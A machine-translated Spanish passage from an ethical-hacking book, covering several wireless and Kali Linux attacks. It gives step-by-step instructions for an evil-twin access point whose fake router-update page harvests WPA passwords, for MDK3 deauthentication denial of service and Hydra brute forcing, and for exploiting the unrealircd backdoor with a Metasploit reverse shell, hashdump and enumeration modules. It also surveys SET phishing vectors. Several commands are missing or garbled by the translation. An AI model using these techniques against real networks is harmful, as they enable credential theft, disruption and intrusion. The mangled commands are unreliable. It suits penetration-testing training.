1 > /proc/sys/net/ipv4/ip_forward”
y luego presione enter. Ahora necesitamos crear algunas reglas de iptables. Estas reglas
determinarán cómo se maneja el tráfico de red. Primero, vamos a crear una regla para
administrar el tráfico que debe ir a nuestra interfaz cableada, que es nuestra fuente de Internet,
así que escribamos;
“iptables - - table nat - -append POSTROUTING - -out-interface eth0 –j MASQUERADE”
masquerade debe escribirse en mayúsculas y luego presionar Enter. Ahora necesitamos crear
una regla para administrar el tráfico que ingresa a nuestra interfaz de túnel, así que escribamos;
Enter. Ahora necesitamos crear una regla que permita las conexiones TCP en el puerto 80 y
las reenvíe a nuestro servidor web, por lo que debemos escribir;
y luego presione Entrar. Para la regla final, necesitamos crear una regla que nos permita
proporcionar una traducción de dirección de red y para hacer esto necesitamos escribir;
y luego presione Entrar. Ahora que tenemos las tablas de IP configuradas, debemos señalarlo
a nuestro archivo de configuración DHCP D e iniciar nuestro servidor DHCP, así que
escribamos; “dhcpd -cf /etc/dhcpd.conf –pf /var/run/dhcpd.pid at0” y luego presione enter.
Luego escriba; “/etc/init.d/isc-dhcp-server start” y luego presione enter. Ahora debería ver el
siguiente resultado:
Eso refleja que el servidor dhcp se inició y se inició correctamente. Por el último
Machine Translated by Google
paso, necesitamos obligar a los clientes de las redes de destino a conectarse a nuestro punto de acceso
gemelo malvado.
Para lograr esto, debemos desconectar a los clientes de la red de destino realizando un ataque de
desautenticación. Tenga en cuenta que hay varias formas de hacer esto, pero para este ataque usaremos
MDK3.
Primero, debemos crear un archivo de lista negra que contenga la dirección MAC o BSSID del objetivo.
Así que escribamos;
aa:bb:cc:dd:ee:ff aquí hace referencia al BSSID objetivo, así que simplemente copie eso de su bloc de
notas y luego péguelo en la terminal para ponerlo en la lista negra como se indica arriba y luego presione
ENTER.
Aquí, debe ingresar el nombre de la interfaz de su monitor y el mío es mon0, y luego el número de canal
de destino y el mío es 6, y luego presione enter. Ahora puede pasar a la computadora que está usando
para simular una víctima.
Si regresa a la terminal airobase para ver la conexión, debería mostrar que alguien está conectado a su
punto de acceso gemelo malvado. Entonces, si regresa a la computadora de su víctima, puede abrir un
navegador web e intentar ir a google.com.
Aquí, debería ver que ha sido llevado a una página de actualización de seguridad y, como usuario, desea
asegurarse de que su enrutador esté actualizado en todas sus actualizaciones, particularmente como
actualizaciones de seguridad, por lo que le pedirá que ingrese su contraseña WPA ya que la actualización
del enrutador está solicitando.
Una vez que confirme la contraseña, haga clic en actualizar. Ahora regresemos a su terminal My SQL y
verifiquemos si pudo capturar la contraseña WPA.
Machine Translated by Google
Entrar, y debería ver que la contraseña del cliente se almacenó en su base de datos
My SQL.
La contraseña debe mostrarse debajo de "contraseña" y la contraseña confirmada
está debajo de "confirmar" dentro de la base de datos My SQL.
Si el cliente hubiera ingresado una contraseña que no coincidía, habría sido llevado a
una página de error que le pediría que volviera a ingresar sus contraseñas porque no
coincidían.
Si el cliente hiciera clic en el botón de cancelar, habría sido llevado a una página que
le asegura la importancia de esta actualización de seguridad y que es por su propio
bien y que no podrá navegar por Internet hasta que realice la actualización. .
Así es como puede crear un punto de acceso gemelo malvado y configurar una página
web que capturará la contraseña WPA.
Asegúrese de tener una autorización por escrito antes de usar estas herramientas, ya
que podría causar un daño grave a todos los dispositivos de red que están conectados
a la red.
Otra amenaza a la seguridad empresarial es, por supuesto, los ataques DOS o de
denegación de servicio. Como sugiere el nombre, un ataque de denegación de servicio, si
tiene éxito, impide que otras personas utilicen el recurso o los servicios.
Interrumpe los servicios para otros usuarios. Hubo un caso en la prensa en el que un
individuo había decidido que estaba cansado de que la gente usara su teléfono celular
mientras conducía, por lo que conducía con un bloqueador celular en su automóvil y mientras
conducía estaba bloqueando todas las frecuencias en el celular. la red.
Así que los vehículos a su alrededor, esas personas no pueden usar sus teléfonos celulares
y usted podría decir, guau, esa es una gran idea, pero debe recordar que las fuerzas del
orden público, las ambulancias, también usan los servicios celulares.
Por lo tanto, cuando interrumpe frecuencias en la red celular para otras personas, también
las interrumpe para servicios que no desea interrumpir. Este individuo en particular fue
rastreado eventualmente, y una vez que lo encontraron, lo arrestaron y lo multaron
fuertemente.
¿Qué sucede si envió una solicitud de sondeo y, aunque el punto de acceso se ocupa de
ese tráfico, no se ocupa del tráfico de otros usuarios? Entonces, básicamente, un enfoque
es simplemente ocupar el punto de acceso para que no pueda manejar el tráfico legítimo.
Bueno, en este capítulo, voy a compartir con ustedes cómo realizar un ataque DOS. La
denegación de servicio o DOS significa que vamos a sacar a todos de una red y negarles el
servicio.
Primero, necesitamos conectar nuestro adaptador de red inalámbrica. Una vez que haya
hecho eso, debe abrir una terminal y luego escribir;
Machine Translated by Google
"ifconfig"
presione enter y ahora necesita abrir un archivo de texto porque necesita tomar nota de cierta
información. Primero, vamos a tomar nota de nuestra interfaz inalámbrica, que para mí es wlan0.
Continúe y tome nota de ese nombre. Una vez que haya hecho eso, puede borrar su terminal
escribiendo
"claro"
luego presione Entrar. A continuación, necesitamos escanear los puntos de acceso disponibles para poder encontrar un
objetivo, así que escriba;
luego presione Entrar. Esto mostrará una lista de todos los puntos de acceso disponibles, así que
continúe y busque un objetivo. Una vez que haya encontrado su objetivo, debe tomar nota del e
SSID y luego debe tomar nota del BSSID, y luego debe tomar nota del número de canal.
Una vez que haya hecho eso, necesitamos crear un archivo de lista negra, así
que escriba; “echo (BSSID del punto de acceso de destino) > lista negra” y luego
presione Enter. Esto creará un archivo llamado "lista negra", que contiene los puntos de acceso de
destino BSSID. Ahora necesitamos poner nuestra interfaz inalámbrica en modo monitor. Para hacer
ese tipo; “airmon-ng start wlan0” y luego presione Enter. Este comando creará una interfaz de
monitor llamada "mon0". Continúe y tome nota de esa interfaz de monitor. Para confirmar que se
“Airmon-ng”
Y luego presione ENTRAR. Esto mostrará todas sus interfaces, y debería ver allí la nueva interfaz
de monitoreo llamada "mon0". Ahora estamos listos para realizar nuestro ataque DOS, así que
sigamos adelante y escribamos;
"mdk3"
Aquí, debe escribir el nombre de la interfaz del monitor, que es mon0, luego el nombre
de nuestro archivo de lista negra, que en mi caso se llama "lista negra", y luego el canal
de nuestro punto de acceso de destino, que en mi caso es "6".
Una vez que haya hecho eso, continúe y presione ENTER. A continuación, verá que
comenzará a enviar paquetes y comenzará a inundar la red.
Mientras tanto, si busca otras máquinas conectadas a la misma red, notará que estarán
desconectadas. Ahora tenemos que seguir adelante y abrir otra terminal, y vamos a
escribir;
y presione Entrar. Al mirar otra computadora cercana, debería ver que acaba de ser
expulsada de la red. Si observa su Wi-Fi, debería ver que se ha desconectado.
Por último, el probador de penetración utilizará Kali Linux para interceptar todo el tráfico y
analizar cualquier ataque a la red. Imagine que usted es el atacante y desea atacar uno de
los hosts de la red que tiene un servicio Telnet activado.
Lo primero que va a hacer un hacker es tratar de usar la fuerza bruta en la víctima objetivo.
Para comenzar con un ataque de fuerza bruta, hay varias herramientas que puede usar,
pero hay una que es muy popular entre los pen testers y que aún no hemos cubierto se
llama "hidra".
Para usar hydra, primero debe abrir la ventana de su terminal Klai Linux y escribir el
comando: “hydra –V –l (ruta del archivo de contraseña del diccionario) –t 50 –(dirección IP
de la víctima) ssh”
Luego presiona enter. Aquí, la opción "-V" es para verbosidad máxima, luego "-l" es para el
nombre de inicio de sesión, seguido de la ruta del archivo de contraseña del diccionario, y
el argumento "-t" selecciona el número de conexiones paralelas.
Cuanto mayor sea el número, más rápido se realizará la prueba, seguida de la dirección IP
de la víctima y, por último, el protocolo que quiero forzar. Una vez que haya presionado
Enter, el ataque comenzará, y todo lo que tiene que hacer ahora es esperar a que se
descifre la contraseña.
En este momento, el hacker está feliz por esta victoria. Si salta a la máquina de prueba de
penetración y analiza este truco, debería ver qué sucede cuando el atacante intenta una
combinación de nombre de usuario y contraseñas que no están autorizadas.
Machine Translated by Google
Para analizar este tipo de conversaciones en Wireshark, haga clic derecho en cualquier
paquete y seleccione "Seguir transmisión TCP". El mensaje dirá que no se permiten
más conexiones al servidor telnet. "Por favor, inténtelo de nuevo más tarde".
Este es el típico mensaje que el atacante está recibiendo una y otra vez cuando falla
durante el ataque de fuerza bruta.
La lista que ve en esta página es Clear Text Protocols como HTTP, FTP y protocolos
de correo electrónico como POP, IMAP, SMTP, Telnet o Voice over IP.
Si descubre que su cliente está utilizando uno de estos protocolos, debe mencionarlo
en su informe final. Una solución simple es reemplazar estos protocolos de texto claro
con otros protocolos seguros como HTTPS en lugar de HTTP, SFTP o SCP en lugar de
FTP, etc.
Machine Translated by Google
Para obtener más información sobre este excelente proyecto, consulte el sitio web oficial de
Armitage en fastandeasyhacking.com. ¿Cómo usar Armitage?
Bueno, Armitage también está incluido en Kali Linux, por lo tanto, todo lo que tiene que hacer es
encenderlo y escribir dentro de su interfaz de línea de comandos: "armitage"
Luego presiona enter. Simplemente puede aceptar las opciones predeterminadas para la
ventana que aparece la primera vez y hacer clic en el botón Conectar, luego haga clic en Sí
para iniciar el servidor Metasploit RPC.
La interfaz de usuario de Armitage tiene tres paneles principales llamados Módulos, Objetivos y
Pestañas. Puede hacer clic en el área entre esos paneles para cambiar su tamaño si lo desea,
pero veamos cada uno de estos paneles.
El panel del navegador de módulos le permite iniciar un módulo auxiliar de Metasploit, un exploit
o generar una carga útil y ejecutar un módulo posterior a la explotación.
El panel de objetivos muestra sus objetivos. Armitage representa cada objetivo como una
computadora con su dirección IP estática o asignada y otra información al respecto debajo del
ícono de la computadora.
Una vez que ejecute la herramienta Armitage, ya debería identificar un host si tiene otros
sistemas ejecutándose en su sesión. Si tiene muchos hosts, será difícil trabajar con la vista de
gráfico.
Si esto sucede, para esta situación, Armitage tiene una vista de tabla en su lugar.
Por lo tanto, vaya al elemento del menú Armitage, luego seleccione "Establecer vista de destino"
y luego seleccione la opción "Vista de tabla". Abajo, tienes la zona de pestañas.
Armitage abre cada consola de diálogo y tabla en una pestaña debajo del módulo y los paneles
de destino. La consola de Metasploit o la consola de Meterpreter y las interfaces de shell usan
cada una una pestaña de consola.
Una pestaña de la consola le permite interactuar con esas interfaces a través de Armitage.
Si desea abrir una nueva consola, debe ir al menú Ver y seleccionar Consola.
Machine Translated by Google
Los registros de Armitage son todos shell de la consola y el registro de eventos le dará una
salida para usted. Organiza esos registros por fecha y nodos. Encontrará estos registros en la
carpeta Armitage.
Vaya a Ver, luego Informes, seleccione luego "Registros de actividad" para abrir la carpeta.
Imagina que quieres exportar todo el tráfico que has hecho en esta aplicación.
Armitage y Metasploit comparten una base de datos para rastrear sus hosts, servicios,
vulnerabilidades, credenciales y cadenas de agentes de usuario, capturadas por los módulos
de explotación del navegador.
Para obtener toda esta información, vaya a Ver, Informes y luego haga clic en Exportar datos.
Esta opción exportará los datos de Metasploit y creará archivos de valores separados por
tabuladores XML fácilmente analizables.
Para comprender mejor de lo que estoy hablando, seleccione el menú Espacios de trabajo y
luego haga clic en Administrar. Para administrar sus espacios de trabajo dinámicos, puede
agregar, editar y eliminar espacios de trabajo que ya creó.
Para iniciar un ataque, Armitage agrupa varios escaneos Metasploit en una función llamada
Escaneos MSF. Esta característica buscará un puñado de puertos abiertos.
De manera similar a nmap, luego enumera varios servicios comunes utilizando módulos
auxiliares de Metasploit que están integrados para este propósito. Para su ejemplo, puede
estar atacando una máquina con Windows XP.
Puede seleccionarlo, hacer clic derecho y luego hacer clic en Escanear. También puede ir al
menú Hosts y hacer clic en MSF Scans, ya que ambos le brindarán la misma funcionalidad.
Una vez que se completa el escaneo, antes de ir y comenzar a atacar, debes elegir tu arma.
Armitage hace que este proceso sea muy fácil. Seleccione el menú "Ataques" y haga clic en
Buscar ataques.
La opción "Buscar ataques" generará un menú de ataque personalizado para cada host.
Para explotar un host, haga clic con el botón derecho en él y navegue hasta Atacar, y elija un
"Explotar" de la lista.
El cuadro de diálogo "Explotar" le permite configurar opciones para un módulo y elegir si usar
una carga útil de conexión inversa o no. Para hazañas remotas,
Machine Translated by Google
En general, Armitage utilizará Meterpreter para objetivos de Windows y una carga útil de
shell de comandos para objetivos de UNIX. Después de esto, todo lo que tiene que hacer
es hacer clic en el botón "Iniciar".
Si el exploit tiene éxito, Armitage hará que el anfitrión se vuelva rojo y lo rodeará con bolas
de rayos espeluznantes. Si falla la explotación manual, no se preocupe. Tienes la opción
de “Ave María”.
Vaya al menú "Ataques" y haga clic en "Ave María" para iniciar esta función.
La función Hail Mary de Armitage encontrará exploits relevantes para su objetivo, luego
filtrará los exploits utilizando información conocida y luego los clasificará en un orden
óptimo.
Esta función no encontrará todos los shells posibles, pero es una buena opción si no sabe
qué más probar. Armitage facilita la administración del agente Meterpreter una vez que
explota con éxito un host.
A continuación, puede hacer clic derecho en el "host" para acceder al menú de Meterpreter,
luego seleccionar "Meterpreter" y elegir lo que quiera de la lista.
Por último, le pediré nuevamente que se asegure de que tiene una autorización por escrito
para usar Armitage en un entorno de producción o en vivo. Si solo está practicando en el
laboratorio de su casa, en un entorno que no sea de producción, eso no debería causar
ningún problema a nadie; aún así, te sugiero que apagues tu enrutador y practiques con
cuidado sin ninguna conexión a Internet.
Metasploit Framework, o MSF, es una herramienta de código abierto diseñada para facilitar
las pruebas de penetración. La aplicación está escrita en el lenguaje de programación
Ruby.
Machine Translated by Google
Utiliza un enfoque modular, lo que facilita las hazañas. Esto facilita el desarrollo y la codificación de
exploits, y también permite implementar fácilmente ataques complejos.
El módulo de explotación son los fragmentos de código que apuntan a vulnerabilidades específicas.
Los exploits activos explotarán un objetivo específico y se ejecutarán hasta que se completen, y luego
saldrán.
Por otro lado, los exploits pasivos esperan hosts entrantes, como navegadores web o clientes FTP, y los
explotan cuando se conectan a la red.
Las cargas útiles son el código malicioso que implementa comandos inmediatamente después de una
explotación exitosa. Los módulos auxiliares no establecen ni admiten directamente el acceso entre el
pen tester y el sistema de destino.
En su lugar, realizan funciones relacionadas, como escaneo, fuzzing o sniffing, que respaldan la fase de
explotación. Después de un ataque exitoso, los módulos de publicación se ejecutan en objetivos
comprometidos para recopilar datos útiles y hacer que el atacante penetre más profundamente en la red
objetivo.
Los codificadores se utilizan para eludir las defensas antivirus y estos módulos codifican la carga útil
para que no se pueda detectar mediante técnicas de coincidencia de firmas.
Por último, los módulos sin operaciones se utilizan para facilitar los desbordamientos de búfer durante
los ataques. Los pasos para explotar un sistema de destino mediante MSF comienzan primero con la
elección y configuración de un exploit.
A continuación, debe verificar el sistema de destino para determinar si es susceptible de ser atacado por
el exploit. Este paso es opcional y debe ser su método para minimizar la detección.
Después de eso, puede elegir y configurar la carga útil, que es el código que se ejecutará en el sistema
de destino luego de una explotación exitosa. Un ejemplo de una carga útil sería algo así como un reverso
del sistema comprometido al host pentester.
Después de este paso, también puede elegir una técnica de codificación para eludir los controles de
detección, como un sistema de detección de intrusos o un software antivirus.
Por último, tienes que ejecutar el exploit.
Déjame explicarte cómo se hace. Como pen tester, debe investigar todas las vulnerabilidades. Por
ejemplo, en el puerto 6667 Metasploitable ejecuta la aplicación llamada “unrealircd”, que es un demonio
IRC.
Machine Translated by Google
Esta versión contiene una puerta trasera que quizás no note durante meses, activada al
enviar las letras A, B, seguidas de un comando del sistema al servidor en cualquier puerto
de escucha.
Metasploit tiene un módulo para explotar esto con el fin de obtener un interactivo. Para
iniciar el truco, primero abre la consola. En Kali, deberá iniciar el servidor "PostgreSQL"
antes de iniciar el marco.
ejecute el comando "espacio de trabajo" en todos los espacios de trabajo que están
"búsqueda"
mando. El exploit devuelto para el servicio IRCD puede aparecer en la lista y asigna la
clasificación relativa de qué tan exitoso es en lograr un exploit.
Puede copiar el nombre del exploit para usarlo en los siguientes comandos. Se puede
obtener información adicional sobre este exploit utilizando el
"información"
mando. La información devuelta debe incluir referencias, así como información sobre este
exploit. Es mejor comprobarlo antes de continuar y perder el tiempo.
"utilizar"
mando. Después del comando "usar", Metasploit cambia el símbolo del sistema de "msf" a
"msf exploit (unreal_ircd_3281_backdoor)".
Machine Translated by Google
Si necesita configurar alguna opción para el exploit, puede hacerlo ejecutando "mostrar
opciones"
mando. Por ejemplo, si necesita configurar el campo requerido para el host remoto, que es
la dirección IP del sistema que está siendo atacado, para cambiar el valor de cualquier
opción, comience por el
"colocar"
palabra clave, seguida del nombre de la opción y, finalmente, ingresa el valor de la opción.
para enumerar todas las cargas útiles adecuadas para este exploit. Hay un montón de ellos,
pero puede seleccionar la "carga útil de shell inversa" para este ejemplo. ¿Por qué harías
eso? Bueno, esto se debe a que es una carga útil popular para los shells de UNIX. Cuando
digo popular, significa que la gente lo usó antes con una buena tasa de éxito.
A continuación, debe verificar las opciones para la carga útil seleccionada. La opción Carga
útil le pedirá que ingrese un valor para la dirección IP del host local. Puedes comprobarlo
con el comando
“si configuración”.
confirmará indicando que se abrió la sesión 1 de Command Shell y brindando las direcciones
IP que originan y terminan el shell inverso.
Cuando un sistema está comprometido hasta este punto, está listo para las actividades
posteriores a la explotación. La explotación posterior es una parte del flujo de trabajo en la
que el atacante obtiene el valor total del ataque.
Una vez que un sistema ha sido comprometido, el atacante generalmente realiza las
siguientes actividades. Él o ella realiza una evaluación rápida para caracterizar el entorno
local, como infraestructura, conectividad, cuentas, presencia de
Machine Translated by Google
Al hacer pivotar el ataque a través del sistema comprometido hacia el resto de la red,
instala puertas traseras persistentes y canales encubiertos para mantener el control y
tener comunicaciones seguras con el sistema comprometido.
Por último, el atacante puede eliminar las indicaciones del ataque del sistema
comprometido. Para tener éxito, las actividades posteriores a la explotación requieren un
conocimiento completo del sistema operativo del objetivo para garantizar que se puedan
eludir los controles de protección.
Si ha utilizado esta herramienta por primera vez, su sesión es 1. Uno de los primeros
módulos que puede probar se llama "hashdump", que intentará recopilar los hash de
contraseñas del sistema.
Debería ver en el resultado una muestra de los archivos de configuración que se han
obtenido del sistema remoto.
Si desea verificar uno de esos archivos txt usando una aplicación de edición de texto,
copie uno de ellos, abra una nueva consola y use la herramienta llamada "aplicación
nano" para ver su contenido.
Machine Translated by Google
Una vez que esté listo para continuar, cierre esta ventana y regrese a su ventana principal.
Esta vez deberá enumerar las configuraciones de red con el módulo "enum_network".
A continuación, puede usar el módulo "enum_protections", pero también puede enumerar todo
el sistema obteniendo información sobre las cuentas de usuario, los paquetes instalados, los
servicios, el disco duro, la versión de Linux, etc.
“sistema_enum”
y puede consultar el contenido de los archivos de texto generados. Para descubrir información
del historial del usuario, también hay un módulo de Metasploit que almacena esta información
en su sistema local que se llama "enum_users_history".
Machine Translated by Google
La ingeniería social es una técnica importante que debe tener en cuenta y, en breve, comprenderá
cómo los piratas informáticos utilizan aplicaciones de ingeniería social para engañar a las víctimas
para que ejecuten la trampa vulnerable.
SET o Social-Engineering Toolkit es un marco de código abierto impulsado por Python que está
diseñado específicamente para facilitar los ataques de ingeniería social.
"kit de herramientas"
y presione Entrar. Tiene varias opciones para seleccionar cuando se carga esta aplicación. El primero
son los ataques de ingeniería social, que ofrece una combinación de métodos de ingeniería social.
El segundo es Fast-Track Penetration Testing, que brinda acceso rápido a algunas herramientas
especializadas. Puede escribir el número 2 para seleccionar esta opción.
Una vez que haya seleccionado esta opción, una vez más tendrá más opciones.
El primero de la lista son los vectores de ataque Spear-Phishing, que permiten a un atacante crear
mensajes de correo electrónico y enviarlos a las víctimas específicas con exploits adjuntos.
A continuación, tenemos los vectores de ataque del sitio web que utilizan múltiples ataques basados
en la web. Si selecciona eso para ver los detalles, simplemente presione el número 2 en su teclado.
Machine Translated by Google
Una vez que haya seleccionado esta opción, se le presentarán más opciones una vez más. El
primero en la lista llamado Java Applet Attack Method que falsifica un certificado Java y entrega
una carga útil basada en Metasploit.
Este es conocido como uno de los ataques más exitosos, y es efectivo contra todos los sistemas
como objetivos Windows, Linux u OSX. El siguiente en la lista se llama Metasploit Browser
Exploit Method que ofrece una carga útil de Metasploit mediante un ataque I-frame.
A continuación en nuestra lista, tenemos lo que se llama el método de ataque Tabnabbing, que
reemplaza la información en una pestaña inactiva del navegador con una página clonada que
se vincula con el atacante.
Después de eso, tenemos el método de ataque Web Jacking que utiliza reemplazos de marcos
I para hacer que el enlace URL resaltado parezca legítimo. Por último en la lista tenemos el
método web Multi-Ataque que permite a un atacante seleccionar algunos o varios, o todos los
ataques que se pueden lanzar a la vez.
Una vez que se haya copiado en un dispositivo USB e insertado en el sistema de destino, se
activará, se ejecutará automáticamente y comprometerá el sistema. A continuación, creará un
módulo Payload and Listener, que es un método rápido basado en menús, creando una carga
útil de Metasploit.
Después de eso, tenemos lo que se llama Mass Mailer Attack, que permite al atacante enviar
múltiples correos electrónicos personalizados a una sola dirección de correo electrónico o una
lista de varias direcciones.
El vector de ataque del punto de acceso inalámbrico, por ejemplo, creará un punto de acceso
inalámbrico falso y un servidor DHCP en el sistema del atacante y redirigirá
Machine Translated by Google
El hacker puede entonces lanzar varios ataques, como el Java Applet Attack o el Credential
Harvester Attack. El QRCode Generator Attack Vector, por ejemplo, crea un código QR con una
URL definida asociada con un ataque.
Los vectores de ataque de Powershell permitirán al atacante crear ataques que se basen en
Powershell, un shell de línea de comandos y un lenguaje de secuencias de comandos disponible
en todos los sistemas, como Windows, Vista y versiones superiores.
Por último, tenemos módulos de terceros que permiten al atacante usar la herramienta de
administración remota como parte de un ataque de subprograma de Java o como una carga útil aislada.
Esta herramienta es una herramienta de acceso remoto basada en menús y texto. Cubrir todos
estos métodos tomaría otro libro por sí solo, pero como puede ver, SET es muy fácil de usar y casi
cualquiera puede usarlo porque todo lo que tiene que hacer es decidir qué ataque desea
implementar, luego presione su número asociado en su teclado. .
Por último, le pediré nuevamente que se asegure de tener una autorización por escrito para usar
SET en un entorno de producción o en vivo. Si solo está practicando en el laboratorio de su casa,
en un entorno que no sea de producción, eso no debería causar ningún problema a nadie; aún así,
te sugiero que apagues tu enrutador y practiques con cuidado sin ninguna conexión a Internet.
Machine Translated by Google
Conclusión
Espero que este libro haya podido ayudarlo a comenzar su búsqueda de convertirse en
un hacker ético o un probador de penetración. Si descubrió que algunas de las técnicas
y estrategias están siendo avanzadas, no se preocupe, porque la práctica continua lo
ayudará a convertirse en un mejor profesional de TI en poco tiempo.
Por último, si disfrutó del contenido, tómese un tiempo para compartir sus pensamientos
y publicar una reseña. ¡Sería muy apreciado!
Machine Translated by Google
Sobre el Autor
Comenzó a trabajar en Service Desk y luego pasó al campo de las redes, donde
participó en varios proyectos que incluyen implementaciones inalámbricas, diseño de
seguridad inalámbrica, seguridad de redes cableadas y seguridad de cortafuegos.